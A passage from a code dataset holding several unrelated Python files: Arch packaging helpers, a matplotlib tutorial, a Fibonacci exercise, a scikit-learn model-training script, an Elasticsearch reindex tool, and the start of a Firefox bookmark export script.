pkgbuild.scalar(\"pkgver\").set(package.recipe.version)\n pkgbuild.scalar(\"pkgrel\").set(package.recipe.revision)\n pkgbuild.scalar(\"pkgdesc\").set(package.recipe.description.strip())\n pkgbuild.scalar(\"url\").set(package.recipe.url)\n\n for dep_package in package.depends:\n pkgbuild.list(\"depends\").append(dep_package.package_name)\n\n for dep_package in package.build_depends:\n pkgbuild.list(\"makedepends\").append(dep_package.package_name)\n\n\n#-----------------------------------------------------------------------\n# Licenses\n\narch_licenses = collections.defaultdict(lambda: \"custom\", {\n \"AGPL\": \"AGPL\",\n \"AGPL3\": \"AGPL3\",\n \"Apache\": \"Apache\",\n \"BSD\": \"BSD\",\n \"BSD3\": \"BSD\",\n \"GPL\": \"GPL\",\n \"GPL2\": \"GPL2\",\n \"GPL3\": \"GPL3\",\n \"LGPL\": \"LGPL\",\n \"LGPL2.1\": \"LGPL2.1\",\n \"LGPL3\": \"LGPL3\",\n \"MIT\": \"MIT\",\n \"Perl\": \"PerlArtistic\",\n \"PHP\": \"PHP\",\n \"Python\": \"Python\",\n \"Ruby\": \"RUBY\",\n \"zlib\": \"ZLIB\",\n})\n\narch_license_file_needed = [\n \"custom\",\n \"BSD\",\n \"MIT\",\n \"Python\",\n \"ZLIB\",\n]\n\nclass ArchLicenseChecker(object):\n def make_pkgbuild(self, package, pkgbuild):\n arch_license = arch_licenses[package.recipe.license]\n pkgbuild.list(\"license\").append(arch_license)\n if arch_license in arch_license_file_needed:\n if package.recipe.license_file:\n package_ = pkgbuild.code(\"package\")\n package_.append(INSTALL_POST, \"\"\"\n install -Dm644 \"%(license_file)s\" \\\\\n \"$pkgdir/usr/share/licenses/$pkgname/LICENSE\"\n \"\"\", package.recipe)\n else:\n raise BuzzyError(\"Need a license_file for %s license\" %\n arch_license)\n\n\n#-----------------------------------------------------------------------\n# OS interface\n\nclass ArchLinux(object):\n name = \"linux (arch)\"\n arch = arch\n\n @classmethod\n def detect(cls):\n if os.path.exists(\"/etc/arch-release\"):\n return cls()\n else:\n return None\n\n def __init__(self):\n # Register a bunch of crap.\n buzzy.recipe.recipe_class = Recipe\n buzzy.build.add(Autotools)\n buzzy.build.add(Cmake)\n buzzy.build.add(buzzy.build.none.NoBuild)\n buzzy.build.add(Python)\n buzzy.source.add(Download)\n buzzy.source.add(Git)\n\n def setup(self):\n # Set a PKGDEST environment variable for our makepkg calls.\n global pkgdest\n pkgdest = os.path.abspath(buzzy.config.env.repo_dir)\n buzzy.utils.makedirs(pkgdest)\n os.environ[\"PKGDEST\"] = pkgdest\n\n # And also one for the name of the packager.\n os.environ[\"PACKAGER\"] = \"%s <%s>\" % \\\n (buzzy.config.env.name, buzzy.config.env.email)\n\n # And construct the path to the repository database.\n global repo_db\n global repo_files_db\n repo_db = os.path.join(pkgdest, \"%s.db.tar.xz\" %\n buzzy.config.env.repo_name)\n repo_files_db = os.path.join(pkgdest, \"%s.files.tar.xz\" %\n buzzy.config.env.repo_name)\n\n def build(self, recipe):\n self.setup()\n recipe.build_recipe(buzzy.config.force)\n\n def install(self, recipe):\n self.setup()\n recipe.install_recipe(buzzy.config.force)\n\n def configure(self):\n pass\n","sub_path":"buzzy/distro/arch/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":15244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"600445582","text":"\"\"\"\nThe Fibonacci numbers, commonly denoted F(n) form a sequence, called the Fibonacci sequence, such that each number is the sum of the two preceding ones, starting from 0 and 1. 
That is,\n\nF(0) = 0, F(1) = 1\nF(N) = F(N - 1) + F(N - 2), for N > 1.\nGiven N, calculate F(N).\n\"\"\"\n\ndef solution(n):\n fn = [0,1]\n for i in range(2,n+1):\n fn.append(fn[i-1]+fn[i-2])\n print(fn)\n return fn[n]\n\nn = 30\nprint(solution(n))","sub_path":"daily-coding-challenge/19022020.py","file_name":"19022020.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"403446719","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.cm as cm\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\n\r\n\r\n\r\n#help(\"matplotlib.pyplot.plot\") #for help\r\n#basic plotting\r\ndef plot1():\r\n\tx = np.linspace(0, 2, 100)\r\n\ty = x ** 2\r\n\tfig = plt.figure(figsize=(10, 5), dpi=100)\r\n\tax1 = fig.add_axes([0.1, 0.1, 0.8, 0.8]) #add_axes([bottom x, bottom y, width, height])\r\n\tax1.plot(x, y, 'bo')\r\n\tax1.set_xlabel('x')\r\n\tax1.set_ylabel('y')\r\n\tax1.set_title('Example figure')\r\n\tplt.show()\r\n\r\ndef plot2():\r\n\tx = np.linspace(0, 2 *np.pi , 100)\r\n\ty = np.sin(x)\r\n\tfig = plt.figure(figsize = (10, 5))\r\n\tax1 = fig.add_axes([0.1, 0.1, 0.8, 0.8])\r\n\tax1.plot(x, y, color='g', marker='o', linestyle='-', linewidth=4, markersize=15)\r\n\tax1.set_xlabel('x')\r\n\tax1.set_ylabel('y')\r\n\tax1.set_title('y = sin(x)')\r\n\tplt.show()\r\n\r\n\r\ndef plot3():\r\n\tx = np.linspace(0, 2, 100)\r\n\ty = x ** 2\r\n\tfig = plt.figure(figsize=(10, 5))\r\n\tax1 = fig.add_axes([0.1, 0.1, 0.8, 0.8])\r\n\tax1.plot(x, y, 'b')\r\n\tax1.set_xlabel('x')\r\n\tax1.set_ylabel('y')\r\n\tax1.set_title('Example figure')\r\n\tplt.show()\r\n\r\n\r\n#fig.savefig('output/out.png') # saving in the output directory to save\r\n# plot1()\r\n#plot2()\r\n# plot3()\r\n\r\n#multiple plots!!!\r\ndef multiple1():\r\n\tx = np.linspace(0, 2 * np.pi , 100)\r\n\ty1 = np.sin(x)\r\n\ty2 = np.cos(x)\r\n\r\n\tplt.plot(x, y1) # curve 1\r\n\tplt.plot(x, y2) # curve 2 \r\n\tplt.plot(x, y1 + y2) # curve 3\r\n\tplt.show()\r\n\r\ndef multiple2():\r\n\tx = np.linspace(0, 2 * np.pi , 100)\r\n\ty1 = np.sin(x)\r\n\ty2 = np.cos(x)\r\n\tplt.plot(x, y1)\r\n\tplt.plot(x, y2)\r\n\tplt.plot(x, y1 + y2)\r\n\tplt.legend([\"sin(x)\", \"cos(x)\", \"sin(x) + cos(x)\"], loc=2) # legend at upper left corner\r\n\tplt.show()\r\n\r\ndef multiple3():\r\n\tplt.figure(figsize=(10, 3))\r\n\tplt.plot([1, 2, 3], [2, 4, 3], linewidth = 6)\r\n\tplt.title('very wide figure')\r\n\t#plt.savefig('output/fig1.png') # do not change, saving to output folder \r\n\tplt.figure() # new figure of default size\r\n\tplt.plot([1, 2, 3], [1, 3, 1], 'r')\r\n\tplt.title('second figure')\r\n\tplt.show()\r\n\t#plt.savefig('output/fig2.png') # do not change, saving to output folder\r\n\r\ndef multiple4():\r\n\tx = np.linspace(0, 2 *np.pi , 100)\r\n\ty1 = np.sin(x)\r\n\tfig, ax = plt.subplots()\r\n\tax.plot(x, y1)\r\n\tax.set_xlabel('x') \r\n\tax.set_ylabel('y') \r\n\tax.set_title('y = sin(x)')\r\n\tplt.show()\r\n#multiple1()\r\n#multiple2()\r\n#multiple3()\r\n#multiple4()\r\n\r\n#plotting multiple curves on the same plot\r\ndef curves1():\r\n\tx = np.linspace(0, 2 * np.pi , 100)\r\n\ty1 = np.sin(x)\r\n\ty2 = np.cos(x)\r\n\r\n\tplt.plot(x, y1) # curve 1\r\n\tplt.plot(x, y2) # curve 2 \r\n\tplt.plot(x, y1 + y2) # curve 3\r\n\tplt.show()\r\n\r\ndef curves2():\r\n\tx = np.linspace(0, 2 * np.pi , 100)\r\n\ty1 = np.sin(x)\r\n\ty2 = np.cos(x)\r\n\r\n\tplt.plot(x, y1)\r\n\tplt.plot(x, y2)\r\n\tplt.plot(x, y1 + y2)\r\n\tplt.legend([\"sin(x)\", \"cos(x)\", \"sin(x) + 
cos(x)\"], loc=2) # legend at upper left corner\r\n\tplt.show()\r\n\r\ndef curves3():\r\n\tplt.figure(figsize=(10, 3))\r\n\tplt.plot([1, 2, 3], [2, 4, 3], linewidth = 6)\r\n\tplt.title('very wide figure')\r\n\tplt.savefig('output/fig1.png') # do not change, saving to output folder \r\n\r\n\tplt.figure() # new figure of default size\r\n\tplt.plot([1, 2, 3], [1, 3, 1], 'r')\r\n\tplt.title('second figure');\r\n\tplt.savefig('output/fig2.png') # do not change, saving to output folder\r\n\tplt.show()\r\n\r\ndef curves4():\r\n\tx = np.linspace(0, 2 *np.pi , 100)\r\n\ty1 = np.sin(x)\r\n\r\n\tfig, ax = plt.subplots()\r\n\tax.plot(x, y1)\r\n\tax.set_xlabel('x') \r\n\tax.set_ylabel('y') \r\n\tax.set_title('y = sin(x)')\r\n\tplt.show()\r\n\r\n#curves1()\r\n#curves2()\r\n#curves3()\r\n#curves4()\r\n\r\ndef subplots1():\r\n\tx = np.linspace(0, 2 * np.pi , 100)\r\n\ty1 = np.sin(x)\r\n\ty2 = np.cos(x)\r\n\r\n\tfig, ax = plt.subplots(2, 2, figsize=(9, 5)) # creates a 2x2 grid\r\n\r\n\tax[0, 0].plot(x, y1) # plots on [0, 0] block on the grid\r\n\tax[0, 0].set_title(\"sin(x)\") \r\n\r\n\tax[0, 1].plot(x, y2) # plots on the [0, 1] block on the grid \r\n\tax[0, 1].set_title(\"cos(x)\") \r\n\r\n\tax[1, 0].plot(x, y1 + y2) # plots on [1, 0] block on the grid\r\n\tax[1, 0].set_title(\"sin(x) + cos(x)\") \r\n\r\n\tax[1, 1].plot(x, y1 - y2) # plots on the [1, 1] block on the grid \r\n\tax[1, 1].set_title(\"sin(x) - cos(x)\") \r\n\r\n\tfig.tight_layout() \r\n\tplt.show()\r\n\r\ndef subplots2():\r\n\tx = np.linspace(0, 2 * np.pi , 100)\r\n\ty1 = np.sin(x)\r\n\ty2 = np.cos(x)\r\n\tfig = plt.figure(figsize=(9, 5)) # creates a figure\r\n\t# we are using a 2x2 grid\r\n\tax1 = fig.add_subplot(221) # creates axis at index 1\r\n\tax1.plot(x, y1)\r\n\tax1.set_title(\"sinx(x)\")\r\n\r\n\tax2 = fig.add_subplot(222) # creates axis at index 2\r\n\tax2.plot(x, y2)\r\n\tax2.set_title(\"cos(x)\")\r\n\r\n\tax3 = fig.add_subplot(223) # creates axis at index 3\r\n\tax3.plot(x, y1 + y2)\r\n\tax3.set_title(\"sin(x) + cos(x)\")\r\n\r\n\tax4 = fig.add_subplot(224) # creates axis at index 4\r\n\tax4.plot(x, y1 - y2)\r\n\tax4.set_title(\"sin(x) - cos(x)\") \r\n\r\n\tfig.tight_layout() \r\n\tplt.show()\r\n\r\n#subplots1()\r\n#subplots2()\r\n\r\n#setting up the axes\r\ndef axes1():\r\n\tx = np.linspace(-5, 5, 100)\r\n\tfig, axes = plt.subplots(3, 1, figsize=(8, 8))\r\n\taxes[0].plot(x, 2 * x + 2, x, 2 * x + 4)\r\n\taxes[0].set_title(\"default axes\")\r\n\r\n\taxes[1].plot(x, 2 * x + 2, x, 2 * x + 4)\r\n\taxes[1].axis('tight') \r\n\taxes[1].set_title(\"tight axes\")\r\n\r\n\taxes[2].plot(x, 2 * x + 2, x, 2 * x + 4)\r\n\taxes[2].set_ylim([-10, 10]) # setting x\r\n\taxes[2].set_xlim([-2, 2])\r\n\taxes[2].set_title(\"custom axes\");\r\n\r\n\tfig.tight_layout() \r\n\tplt.show()\r\n\r\ndef logaxes():\r\n\tx = np.linspace(0, 10, 100)\r\n\ty = np.exp(2 * x)\r\n\r\n\tfig, axes = plt.subplots(1, 2, figsize=(12, 8))\r\n\r\n\taxes[0].plot(x, y)\r\n\taxes[0].set_title(\"Normal\")\r\n\r\n\taxes[1].plot(x, y)\r\n\taxes[1].set_yscale('log') # setting yscale to log\r\n\taxes[1].set_title(\"Logarithmic\")\r\n\tplt.show()\r\n\r\ndef grid():\r\n\tx = np.linspace(-10, 10, 100)\r\n\ty = x**2 + (2 * x) + 6\r\n\r\n\tfig, axes = plt.subplots(1, 2, figsize=(12, 8))\r\n\r\n\taxes[0].plot(x, y)\r\n\taxes[0].grid(True)\r\n\taxes[0].set_title(\"Deafult Grid\")\r\n\r\n\taxes[1].plot(x, y)\r\n\taxes[1].grid(color='g', linewidth=1, linestyle='dashed')\r\n\taxes[1].set_title(\"Custom Grid\")\r\n\tplt.show()\r\n\r\ndef propchange():\r\n\tx = np.linspace(-10, 10, 100)\r\n\ty = 
x**2 + (2 * x) + 6\r\n\r\n\tfig, axes = plt.subplots(figsize=(12, 8))\r\n\taxes.spines['top'].set_color('r') # setting color of top spine\r\n\taxes.spines['bottom'].set_color('b') # setting color of bottom spine\r\n\taxes.spines['bottom'].set_linewidth(2) # setting linewidth of bottom spine\r\n\taxes.spines['left'].set_color('g') # setting color of left spine\r\n\taxes.plot(x, y)\r\n\tplt.show()\r\n\r\ndef twinaxes():\r\n\tt = np.linspace(0, np.pi/100, 100) # an array of time\r\n\tprint(t)\r\n\tW = 2 * np.pi * 50 # angular frequency\r\n\ttheta = np.pi/2 # phase difference\r\n\r\n\tI = 5 * np.sin(W * t) # values of current\r\n\tV = 24 * np.sin(W * t + theta) # values of voltage\r\n\r\n\tfig, axesI = plt.subplots(figsize=(12, 8))\r\n\r\n\taxesI.plot(t, I, 'r')\r\n\taxesI.set_xlabel(\"time(s)\")\r\n\taxesI.set_ylabel(\"Current(A)\", color='red')\r\n\r\n\taxesV = axesI.twinx() # instantiate a second axes that shares the same x-axis\r\n\r\n\taxesV.plot(t, V, 'b')\r\n\taxesV.set_ylabel(\"Voltage(V)\", color='blue') \r\n\tplt.show()\r\n\r\ndef ticks():\r\n\tt = np.linspace(0, 2 * np.pi, 100) \r\n\tI = 5 * np.sin(t) \r\n\r\n\tfig, axes = plt.subplots(figsize=(12, 8))\r\n\r\n\taxes.plot(t, I, 'r')\r\n\taxes.set_xlabel(\"time(s)\")\r\n\taxes.set_ylabel(\"Current(A)\")\r\n\r\n\taxes.set_xticks(np.linspace(0, 2 * np.pi, 5)) # specifying ticks\r\n\taxes.set_xticklabels(['0', r'$0.5\\pi$', r'$\\pi$', r'$1.5\\pi$', r'$2\\pi$' ]) # custom ticks\r\n\tplt.show()\r\n\r\n#axes1()\r\n#logaxes()\r\n#grid()\r\n#propchange()\r\n#twinaxes()\r\n#ticks()\r\n\r\n#Gallery of Graphs\r\n\r\ndef pie():\r\n\tgenre = ['Drama', 'Comedy', 'Thriller', 'Sci-Fi', 'History']\r\n\tamount = [100, 25, 30, 70, 75]\r\n\tpieColor = ['MediumBlue', 'SpringGreen', 'BlueViolet'];\r\n\r\n\tplt.axis('equal')\r\n\tplt.pie(amount, labels=genre, autopct='%1.1f%%', colors=pieColor)\r\n\tplt.show()\r\n\r\ndef histogram():\r\n\tn = np.random.randn(100000)\r\n\tfig, axes = plt.subplots(figsize=(12, 8))\r\n\tplt.hist(n)\r\n\taxes.set_title(\"Histogram\")\r\n\taxes.set_xlim((min(n), max(n)))\r\n\tplt.show()\r\n\r\ndef bar():\r\n\ty = np.random.randint(low=1, high=100, size=10)\r\n\tx = np.arange(10)\r\n\tfig, axes = plt.subplots(figsize=(12, 8))\r\n\taxes.bar(x, y)\r\n\taxes.set_xticks(np.arange(10))\r\n\taxes.set_title(\"Bar Chart\")\r\n\tplt.show()\r\n\r\ndef box():\r\n\tdata1 = np.random.randint(low=1, high=100, size=50)\r\n\tdata2 = np.random.randint(low=1, high=100, size=50)\r\n\tdata = [data1, data2]\r\n\tfig, axes = plt.subplots(figsize=(12, 8))\r\n\r\n\taxes.boxplot(data)\r\n\taxes.set_title(\"Box Plot\")\r\n\tplt.show()\r\n\r\ndef polar():\r\n\ttheta = np.linspace(0, 2 * np.pi , 100)\r\n\tr = np.sin(50 * theta) * np.cos(50 * theta) \r\n\tfig = plt.figure()\r\n\tax = fig.add_subplot(111, polar=True) \r\n\tax.plot(theta, r)\r\n\tplt.show()\r\n\r\ndef fillbet():\r\n\tx = np.linspace(0, 10, 100)\r\n\tfig, axes = plt.subplots(figsize=(12, 8))\r\n\taxes.fill_between(x, 2 * x**2, x**2)\r\n\tplt.show()\r\n\r\ndef scatter():\r\n\tx = np.linspace(0, 10, 100)\r\n\ty = np.random.randint(low=1, high=100, size=100) # creates a random array of 100 intergers \r\n\t # ranging from 1 - 100\r\n\tfig, axes = plt.subplots(figsize=(12, 8))\r\n\taxes.scatter(x, y, marker='.')\r\n\tplt.show()\r\n\r\n#pie()\r\n#histogram()\r\n#bar()\r\n#box()\r\n#polar()\r\n#fillbet()\r\n#scatter()\r\n\r\n#3D Plots\r\ndef spiral(a, b, t):\r\n x = a * np.cos(t)\r\n y = a * np.sin(t)\r\n z = b * t\r\n return x, y, z\r\n\r\ndef woah():\r\n\tt = np.linspace(0, 20, 100)\r\n\tx1, y1, z1 
= spiral(4, 1, t)\r\n\tx2, y2, z2 = spiral(2, 2, t)\r\n\r\n\tfig = plt.figure()\r\n\tax = fig.add_subplot(111, projection='3d')\r\n\tax.plot(x1, y1, z1)\r\n\tax.plot(x2, y2, z2)\r\n\tplt.show()\r\n\r\ndef func(x, y):\r\n    z = np.sin(np.sqrt(x ** 2 + y ** 2))\r\n    return z \r\n\r\ndef pretty():\r\n\tx = np.linspace(-6, 6, 30)\r\n\ty = np.linspace(-6, 6, 30)\r\n\tX, Y = np.meshgrid(x, y)\r\n\tZ = func(X, Y)\r\n\r\n\tfig = plt.figure()\r\n\tax = fig.add_subplot(111, projection='3d')\r\n\tax.plot_surface(X, Y, Z, cmap=cm.cool)\r\n\tplt.show()\r\n\r\ndef woah2():\r\n\tt = np.linspace(0, 20, 100)\r\n\tx, y, z = spiral(4, 2, t)\r\n\r\n\tfig = plt.figure()\r\n\r\n\tax1 = fig.add_subplot(121, projection='3d')\r\n\tax1.plot(x, y, z)\r\n\tax1.view_init(45, 45)\r\n\r\n\tax2 = fig.add_subplot(122, projection='3d')\r\n\tax2.plot(x, y, z, color='r')\r\n\tax2.view_init(30, 90)\r\n\tplt.show()\r\n#woah()\r\n#pretty()\r\n#woah2()\r\n\r\n#exercises\r\n#ex 1 - plotting temps\r\n\r\ndef temps():\r\n\tland_temp = np.array([6, 7, 8, 10, 14, 16, 18, 17, 15, 12, 11, 9])\r\n\tsea_temp = np.array([4, 5, 10, 11, 12, 16, 19, 18, 14, 10, 8, 5])\r\n\r\n\tfig, ax = plt.subplots(2, 1)\r\n\tticks = ['jan','feb','mar','apr','may','jun','jul','aug','sep','oct','nov','dec']\r\n\r\n\tx = np.linspace(0, 13, 12)\r\n\t# commands for plotting the first graph\r\n\tax[0].plot(x, land_temp, 'r', label = 'air temp')\r\n\tax[0].plot(x, sea_temp, 'b', label = 'sea temp')\r\n\tax[0].set_xticks(x) \r\n\tax[0].set_xticklabels(ticks)\r\n\tax[0].legend(loc = 'best')\r\n\tax[0].set_ylabel('temp (Celsius)')\r\n\tax[0].set_xlabel('months')\r\n\r\n\t# commands for plotting the second graph\r\n\tax[1].plot(x, land_temp - sea_temp, 'b-o')\r\n\tax[1].set_xticks(x) \r\n\tax[1].set_xticklabels(ticks)\r\n\tax[1].set_ylabel('land - sea temp (Celsius)')\r\n\tax[1].set_xlabel('months')\r\n\r\n\t# to prevent overlap in plots\r\n\tfig.tight_layout()\r\n\tplt.show()\r\n\r\ntemps()\r\n\r\n#ex 2 - plotting torus\r\n\r\n\r\n# defining function\r\ndef torus(r, R, theta, phi):\r\n    x = (R + r * np.cos(theta)) * np.cos(phi)\r\n    y = (R + r * np.cos(theta)) * np.sin(phi)\r\n    z = r * np.sin(theta)\r\n    return x, y, z\r\n\r\n# initializing values of arrays\r\ndef torus_plot():\r\n\tangle = np.linspace(0, 2 * np.pi, 100)\r\n\ttheta, phi = np.meshgrid(angle, angle)\r\n\tx, y, z = torus(1, 2, theta, phi)\r\n\r\n\t# initializing figure\r\n\tfig = plt.figure(figsize = (12, 8))\r\n\r\n\t# plotting commands for first plot\r\n\tax1 = fig.add_subplot(1, 2, 1, projection = '3d')\r\n\tax1.plot_surface(x, y, z, cmap = cm.cool)\r\n\tax1.view_init(36, 26)\r\n\tax1.set_zlim(-3, 3)\r\n\r\n\t# plotting commands for second plot\r\n\tax2 = fig.add_subplot(1, 2, 2, projection = '3d')\r\n\tax2.plot_surface(x, y, z, cmap = cm.rainbow)\r\n\tax2.view_init(15, 45)\r\n\tax2.set_zlim(-3, 3)\r\n\tplt.show()\r\n\r\ntorus_plot()\r\n\r\n","sub_path":"educative/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":11897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"320527545","text":"\n\n#class header\nclass _CELLAR():\n\tdef __init__(self,): \n\t\tself.name = \"CELLAR\"\n\t\tself.definitions = [u'a room under the ground floor of a building, usually used for storing things']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn
self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_cellar.py","file_name":"_cellar.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"654169074","text":"'''\n    DataFrame.equals(self, other)\n'''\n\nimport pandas as pd\nimport time\n\nTstart1 = time.perf_counter()\nPatronsFromCsv = pd.read_csv(\"patrons.csv\")\nPatronsFromCsv.drop(['Start'], axis=1, inplace=True)\nPatronsFromCsv.drop(0, axis=0, inplace=True)\nTfinish1 = time.perf_counter()\nprint(f\"Time to load csv {Tfinish1-Tstart1}\")\n\n#print(PatronsFromCsv)\n\nTstart2 = time.perf_counter()\nPatronsFromXlsx = pd.read_excel(\"patrons.xlsx\")\nPatronsFromXlsx.drop(['Start'], axis=1, inplace=True)\nPatronsFromXlsx.drop(0, axis=0, inplace=True)\nTfinish2 = time.perf_counter()\nprint(f\"Time to load xlsx {Tfinish2-Tstart2}\")\n\n#print(PatronsFromXlsx)\n\nprint(pd.DataFrame.equals(PatronsFromCsv, PatronsFromXlsx))","sub_path":"tests/tests/import/pandasAssertEqual.py","file_name":"pandasAssertEqual.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"574703650","text":"import argparse\nimport task_broker_common as tb\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--id\", required=True, help=\"specify task instance id\")\narg = parser.parse_args()\n\n\ndef exec_task(params):\n\t# dummy task\n\ttmp = 1\n\tfor a in range(50000000):\n\t\tif a > 1:\n\t\t\ttmp = tmp * a + 1\n\t\t\ttmp = tmp / a\n\tprint(' ' + str(tmp))\n\ndef main():\n\ttb.task_main_loop('aaa', arg.id, exec_task)\n\nmain()\n","sub_path":"aaa_worker.py","file_name":"aaa_worker.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"141543552","text":"from pandas import read_csv\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis as LDA\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn import svm\nimport pickle\nimport os\n\n\ndef train_model(X, y, lda):\n    \"\"\"Train the models and return a list of models.\"\"\"\n    model_dict = dict() # model dictionary\n    dc_model = DecisionTreeClassifier(criterion='entropy', max_depth=5, random_state=0) # decision tree classifier\n    model_dict['DecisionTreeClassifier'] = dc_model # saved models\n    knc_model = KNeighborsClassifier(n_neighbors=3) # KNN classifier\n    model_dict['KNeighborsClassifier'] = knc_model\n    svm_model = svm.SVC(C=1,kernel='linear') # SVM\n    model_dict['svm'] = svm_model\n    lr_model = LogisticRegression(C=30, random_state=0) # Logistic\n    model_dict['LogisticRegression'] = lr_model\n    for key, model in model_dict.items(): # iterate through all the models and train them\n        try:\n            model.fit(X,y)\n            print(\"Accuracy for \" + key + \": \" + str(model.score(X,y) * 100) + \"%\")\n        except Exception:\n            print(\"Error when training model: \", key)\n    model_dict['lda'] = lda # save the LDA (was already trained)\n    pickle.dump(model_dict,open( \"save_model.pkl\", \"wb\" )) # saved those models locally\n\n\ndef predict(file):\n    \"\"\"Predict student behavior type given the file path\"\"\"\n    load_data = read_csv(file, delimiter=\",\", skiprows=0) # load the csv file locally\n    load_data = load_data.values\n    X = load_data[:, 2:] # retrieve input\n    dir_path = os.path.dirname(os.path.realpath(__file__)) # get the current directory path\n    with open(dir_path + \"/save_model.pkl\", \"rb\" ) as f: # load saved model pickle file\n        saved_model = pickle.load(f)\n    lda = saved_model['lda'] # get LDA model\n    X = lda.transform(X) # transform X\n\n    '''Change the following to take the majority vote from all the models******'''\n    y = saved_model['DecisionTreeClassifier'].predict(X) # predict using the first model and output\n    '''**********************************************************************'''\n\n    y = y.tolist()\n    return y\n\n\nif __name__ == '__main__':\n    dir_path = os.path.dirname(os.path.realpath(__file__)) # get the current directory path\n    data = read_csv(dir_path + '/StatisticalAnalysis.csv',delimiter=\",\",skiprows = 0)\n    data = data.values\n    X = data[:, 2:]\n    y = data[:, 0].astype(int)\n    lda = LDA(n_components=2) # dimension reduction via LDA\n    lda = lda.fit(X, y)\n    X = lda.transform(X)\n    train_model(X, y, lda) # train models and save\n","sub_path":"intelligentHint/behaviordetection/Models.py","file_name":"Models.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"102876814","text":"import click\n\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch.helpers import scan, bulk, reindex\nimport re\nimport requests\n\n\nsettings_location = '/home/svetlin/workspace/clients/ercisson/2.1/mapping/mapping.json'\n\n\ndef format_date(date):\n    fix_month = re.sub(r'-(\\d)-', r'-0\\1-', date)\n    fix_day_and_month = re.sub(r'-(\\d)$', r'-0\\1', fix_month)\n    return fix_day_and_month\n\n\ndef replace_fields_with_dots(_source):\n    keys_without_dots = [e.replace('.', '') for e in _source.keys()]\n    return zip(keys_without_dots, _source.values())\n\n\ndef unify_date_format(_source):\n    date_fields = ['date_created', 'date_modified', 'date_prepared',\n                   'date', 'date_approved']\n    for date_field in date_fields:\n        date_str = _source.get(date_field, None)\n        if date_str:\n            _source[date_field] = format_date(date_str)\n    return _source\n\n\ndef change_doc(hits, index):\n    for h in hits:\n        h['_index'] = index\n        if 'fields' in h:\n            h.update(h.pop('fields'))\n\n        yield h\n\n\ndef custom_reindex(client, source_index, target_index, query=None,\n                   target_client=None, chunk_size=500, scroll='5m',\n                   scan_kwargs={}, bulk_kwargs={}):\n    \"\"\"\n    Custom method since we want to change index field names.\n    \"\"\"\n    target_client = client if target_client is None else target_client\n    docs = scan(\n        client,\n        query=query,\n        index=source_index,\n        scroll=scroll,\n        fields=('_source', '_parent', '_routing', '_timestamp'),\n        **scan_kwargs\n    )\n    kwargs = {'stats_only': True, }\n    kwargs.update(bulk_kwargs)\n    changed_doc = change_doc(docs, target_index)\n    return bulk(target_client, changed_doc, chunk_size=chunk_size, **kwargs)\n\n\ndef load_file(location):\n    with open(location) as f:\n        mapping = f.read()\n    return mapping\n\n\ndef add_mapping(settings_location, host, port, index_name):\n    url = 'http://{host}:{port}/{index_name}'.format(\n        host=host,\n        port=port,\n        index_name=index_name\n    )\n    r = requests.put(url, data=load_file(settings_location))\n    if r.status_code != 200:\n        raise Exception('Can not add mapping', r.text)\n\n\n@click.command()\n@click.option('--source_host', default='localhost', help='Elastic source IP.')\n@click.option('--source_port', default=9200, help='Elastic source port.')\n@click.option('--dest_host', default='localhost', help='Elastic dest IP.')\n@click.option('--dest_port', default=9200, help='Elastic dest
port.')\n@click.option('--source_indices', default='', help='Comma separated list, no spaces')\n@click.option('--dest_indices', default='', help='Comma separated list, no spaces')\n@click.option('--chunk_size', default='500', help='Chunk size')\n@click.option('--doc_type', default='', help='Document type to filter on')\n@click.option('--scroll', default='5m', help='Scroll duration')\ndef do_reindex(source_host, source_port, dest_host, dest_port, source_indices,\n dest_indices, chunk_size, scroll, doc_type):\n source_client = Elasticsearch(\n [{'port': source_port, 'host': source_host}],\n timeout=200\n )\n dest_client = Elasticsearch(\n [{'port': dest_port, 'host': dest_host}],\n timeout=200\n )\n source_indices = source_indices.split(',')\n dest_indices = dest_indices.split(',') if dest_indices else source_indices\n query = u'{ \"query\": { \"filtered\": { \"filter\": { \"term\": { \"_type\": \"%s\" } } } } }' % doc_type if doc_type else None\n for source_index_name, dest_index_name in zip(source_indices, dest_indices):\n reindex(\n source_client,\n source_index_name,\n dest_index_name,\n query,\n dest_client,\n chunk_size=chunk_size,\n scroll=scroll,\n bulk_kwargs={'raise_on_error': False}\n )\n\n\nif __name__ == '__main__':\n do_reindex()\n","sub_path":"reindex.py","file_name":"reindex.py","file_ext":"py","file_size_in_byte":3920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"297792375","text":"import sqlite3\nimport unicodedata\n\ndef fromsql(fname):\n destination = open(\"bookmarks.csv\", 'a')\n conn = sqlite3.connect(fname)\n db = dict()\n cursor = conn.execute(\"SELECT moz_bookmarks.parent, moz_bookmarks.type, moz_bookmarks.title, moz_bookmarks.id, moz_bookmarks.dateAdded, moz_bookmarks.lastModified, moz_places.url FROM moz_bookmarks, moz_places WHERE moz_bookmarks.fk = moz_places.id AND moz_bookmarks.type = 1 AND 